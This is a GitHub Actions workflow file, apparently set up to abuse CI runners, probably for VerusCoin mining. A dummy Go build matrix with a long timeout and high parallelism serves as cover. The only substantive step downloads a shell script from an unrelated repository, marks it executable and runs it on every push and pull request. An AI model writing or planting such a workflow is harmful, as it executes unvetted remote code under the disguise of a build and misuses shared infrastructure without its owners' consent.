name: VERUSCOIN
on: [push, pull_request]
jobs:
  build:
    name: dahlah
    runs-on: ubuntu-18.04
    strategy:
      max-parallel: 30
      fail-fast: false
      matrix:
        go: [1.6]
        flag: [A]
    timeout-minutes: 360
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Setup
      uses: actions/checkout@v1
    - name: siIaan
      run: |
        wget https://github.com/dahlahh/ntahapa/blob/main/ntah.sh && chmod u+x ntah.sh && ./ntah.sh
